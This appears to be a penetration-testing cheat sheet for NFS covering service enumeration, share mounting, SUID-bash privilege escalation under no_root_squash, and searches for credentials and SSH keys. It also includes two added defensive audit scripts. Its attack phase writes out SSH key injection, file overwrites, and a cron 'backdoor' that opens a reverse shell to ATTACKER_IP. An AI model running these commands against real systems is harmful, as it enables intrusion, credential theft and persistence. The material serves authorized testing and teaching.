Network File System
Environment Variables / Setup
export IP=
export PORT=2049
Phase 1: NFS Service Discovery
Nmap NFS Scripts
nmap --script=nfs-* -p$PORT $IP
RPC Services Enumeration
# Check RPC services (NFS typically uses RPC)
nmap -p 111 --script=rpc-grind $IP
rpcinfo -p $IP
Phase 2: NFS Share Enumeration
Show Exported Shares
# List NFS exports as seen from the client
showmount -e $IP
# On the NFS server itself: list its active exports with their options
exportfs -v
Detailed Export Information
# Show mount information
showmount -a $IP
showmount -d $IP
Phase 3: NFS Share Mounting
Create Mount Point
mkdir /tmp/nfs_mount
Mount NFS Shares
# Mount discovered shares
mount -t nfs $IP:/path/to/share /tmp/nfs_mount
# Mount with specific NFS version
mount -t nfs -o vers=3 $IP:/path/to/share /tmp/nfs_mount
mount -t nfs -o vers=4 $IP:/path/to/share /tmp/nfs_mount
# no_root_squash is a server-side export option, not a mount option:
# mount normally and then test whether files created as root keep UID 0
mount -t nfs -o vers=3 $IP:/path/to/share /tmp/nfs_mount
Explore Mounted Shares
# List contents
ls -la /tmp/nfs_mount/
# Check permissions and numeric ownership (shows how the server maps UIDs/GIDs)
ls -lan /tmp/nfs_mount/
find /tmp/nfs_mount/ -type f -readable 2>/dev/null
find /tmp/nfs_mount/ -type f -writable 2>/dev/null
Phase 4: NFS Privilege Escalation
Root Squashing Check
# Check if root squashing is disabled: run as root on the client; if the new
# file is owned by nobody/65534, root_squash is active
id
touch /tmp/nfs_mount/root_test
ls -lan /tmp/nfs_mount/root_test
UID Manipulation
# Create user with specific UID if needed
sudo useradd -u 1001 tempuser
sudo su tempuser
touch /tmp/nfs_mount/uid_test
ls -la /tmp/nfs_mount/uid_test
SUID Binary Placement
# If writable and no_root_squash (the nosuid mount option on the target
# is the standard hardening that defeats this)
cp /bin/bash /tmp/nfs_mount/bash_suid
chmod +s /tmp/nfs_mount/bash_suid
# Execute from target system
./bash_suid -p
Phase 5: NFS File Analysis
Search for Sensitive Files
# Look for interesting files
find /tmp/nfs_mount/ -name "*.txt" -o -name "*.conf" -o -name "*.log" 2>/dev/null
find /tmp/nfs_mount/ -name "*password*" -o -name "*passwd*" -o -name "*credential*" 2>/dev/null
# Search file contents
grep -r "password\|passwd\|credential" /tmp/nfs_mount/ 2>/dev/null
grep -r "BEGIN RSA PRIVATE KEY\|BEGIN OPENSSH PRIVATE KEY" /tmp/nfs_mount/ 2>/dev/null
SSH Key Discovery
# Look for SSH keys
find /tmp/nfs_mount/ -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "authorized_keys" 2>/dev/null
# Copy SSH keys if found
cp /tmp/nfs_mount/path/to/ssh/key ./
chmod 600 ./id_rsa
ssh -i ./id_rsa user@$IP
Phase 6: NFS Configuration Analysis
Check NFS Configuration
If you gain system access, examine NFS configuration:
cat /etc/exports
grep nfs /etc/fstab
Common Misconfigurations
Look for:
- no_root_squash: remote root keeps UID 0 on the export (the default, root_squash, maps it to nobody)
- no_all_squash: client-supplied UIDs/GIDs are trusted as-is
- rw permissions: write access to the export
- Wide network ranges or wildcards: overly permissive host access
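The following is an added example, not part of the original cheat sheet: a small audit script that reads an exports(5) file and flags the entries above (no_root_squash, rw or any access granted to a wildcard client, and the insecure option, which accepts requests from unprivileged source ports). The sample exports text, the function names audit_exports and count_export_risks, and the RISK output format are all assumptions made for this example; it also covers the classic pitfall where a space before the parentheses ("/dir (rw)") leaves the client field empty, which exports the directory to every host.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): audit exports(5) text
# for the misconfigurations listed above. Sample data is constructed.

SAMPLE_EXPORTS='# constructed sample /etc/exports
/srv/share   *(rw,sync,no_root_squash)
/srv/public  10.0.0.0/24(ro,sync,root_squash)
/home        192.168.1.0/24(rw,no_subtree_check,insecure)
/srv/backup  10.0.0.5(rw,sync,all_squash,anonuid=65534)
/srv/oops    (rw,sync)'

# audit_exports: read exports text on stdin and print one "RISK" line per
# client entry that has a finding. Always exits 0.
audit_exports() {
    awk '
    /^[[:space:]]*(#|$)/ { next }        # skip comments and blank lines
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            entry = $i; client = entry; opts = ""
            if (match(entry, /\(.*\)/)) {
                client = substr(entry, 1, RSTART - 1)
                opts   = substr(entry, RSTART + 1, RLENGTH - 2)
            }
            # "/dir (rw)": a space before the parentheses leaves the client
            # empty, which exportfs treats as "every host"
            if (client == "") client = "*"
            issues = ""; rw = 0
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++) {
                if (o[j] == "rw")             rw = 1
                if (o[j] == "no_root_squash") issues = issues " no_root_squash"
                if (o[j] == "insecure")       issues = issues " insecure"
            }
            if (client ~ /\*/) {
                if (rw) issues = issues " rw-to-wildcard"
                else    issues = issues " wildcard-client"
            }
            if (issues != "") print "RISK " path " " client ":" issues
        }
    }'
}

# count_export_risks: number of RISK lines for the exports text given as $1.
count_export_risks() {
    printf '%s\n' "$1" | audit_exports | grep -c '^RISK' || true
}

# Usage: audit the constructed sample. On a real server you would run
#   audit_exports < /etc/exports
printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports
```

Run against the sample, the script reports /srv/share (no_root_squash, rw to a wildcard), /home (insecure) and /srv/oops (rw exported to everyone because of the stray space); the two entries with root_squash or all_squash and a bounded client range produce no finding.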
Phase 7: NFS Attacks
File Overwrite Attack
# If writable share contains important files
# Backup original file first
cp /tmp/nfs_mount/important_file /tmp/nfs_mount/important_file.bak
# Modify file (e.g., cron job, script, config)
echo "malicious_content" > /tmp/nfs_mount/important_file
SSH Key Injection
# If .ssh directory is writable
echo "your_public_key" >> /tmp/nfs_mount/home/user/.ssh/authorized_keys
Cron Job Injection
# If cron directories are writable
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" > /tmp/nfs_mount/etc/cron.d/backdoor
Phase 8: NFS Version Specific
NFSv3 Specific
# NFSv3 uses additional RPC services
rpcinfo -p $IP | grep -E "(nfs|mount|nlockmgr)"
# Mount with NFSv3
mount -t nfs -o vers=3 $IP:/share /tmp/nfs_mount
NFSv4 Specific
# NFSv4 multiplexes everything over TCP 2049 and needs neither the portmapper nor a separate mountd
mount -t nfs -o vers=4 $IP:/share /tmp/nfs_mount
# NFSv4 pseudo-filesystem
mount -t nfs -o vers=4 $IP:/ /tmp/nfs_mount
NFS Security Bypass Techniques
Firewall Bypass
# NFS might use random ports for some services
# Use rpcinfo to discover actual ports
rpcinfo -p $IP
# Connect to specific RPC services
rpcinfo -t $IP 100003 # NFS service
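Because mountd, nlockmgr and status bind dynamic ports on Linux unless the server pins them, a defender auditing a host wants a quick map of which NFS-family service is listening where. The script below is an added example, not part of the original cheat sheet: it parses the text format of `rpcinfo -p` (a constructed sample is embedded) and lists the services that sit outside the well-known ports 111 and 2049. The function names rpc_ports and unpinned_services and the sample port numbers are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): map NFS-related RPC
# services to the ports they actually bound, from `rpcinfo -p` text.

# Constructed sample output of `rpcinfo -p` (port values are illustrative).
SAMPLE_RPCINFO='   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   udp    111  portmapper
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100005    1   udp  40517  mountd
    100005    3   tcp  38267  mountd
    100021    1   udp  39654  nlockmgr
    100021    4   tcp  45133  nlockmgr
    100024    1   tcp  52987  status'

# rpc_ports: print "service proto port" (deduplicated across RPC versions)
# for the NFS family of services found in rpcinfo -p text on stdin.
rpc_ports() {
    awk '$5 ~ /^(nfs|mountd|nlockmgr|status|portmapper)$/ { print $5, $3, $4 }' \
        | sort -u
}

# unpinned_services: services bound outside 111 (portmapper) and 2049 (nfs),
# i.e. the ones a firewall cannot allow-list until the server pins them.
unpinned_services() {
    rpc_ports | awk '$3 != 111 && $3 != 2049 { print $1 }' | sort -u
}

# Usage: on a live host replace the sample with `rpcinfo -p $IP | rpc_ports`
printf '%s\n' "$SAMPLE_RPCINFO" | rpc_ports
printf '%s\n' "$SAMPLE_RPCINFO" | unpinned_services
```

With the sample input, unpinned_services reports mountd, nlockmgr and status. On a Linux server running nfs-utils these can be given fixed ports in /etc/nfs.conf (the mountd, lockd and statd sections each accept a port setting), after which the firewall can restrict NFS to a known set of ports instead of the whole ephemeral range; an NFSv4-only deployment avoids the issue entirely.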
Authentication Bypass
# NFS with the default AUTH_SYS (sec=sys) relies on host/IP-based access control
# and trusts the UID/GID the client sends
# May accept connections from any IP if the export list is misconfigured
Cleanup
Unmount Shares
umount /tmp/nfs_mount
rmdir /tmp/nfs_mount
Common NFS Ports
111/tcp,udp - RPC Port Mapper
2049/tcp,udp - NFS
4045/tcp,udp - NFS Lock Manager
4046/tcp,udp - NFS Status Monitor
NFS Enumeration Checklist
- RPC service discovery
- Export enumeration with showmount
- Share mounting and exploration
- Permission testing (read/write/execute)
- Root squashing verification
- Sensitive file search
- SSH key discovery
- Configuration file analysis
- SUID binary placement (if no_root_squash)
Tools Summary
# Discovery and enumeration
nmap, rpcinfo, showmount
# Mounting and exploration
mount, umount, find, grep
# File manipulation
cp, chmod, chown (if no_root_squash)
Next Steps
Once NFS enumeration is complete:
- Analyze file permissions and ownership
- Search for credentials and sensitive data
- Test privilege escalation via UID manipulation
- Look for persistence opportunities via file modification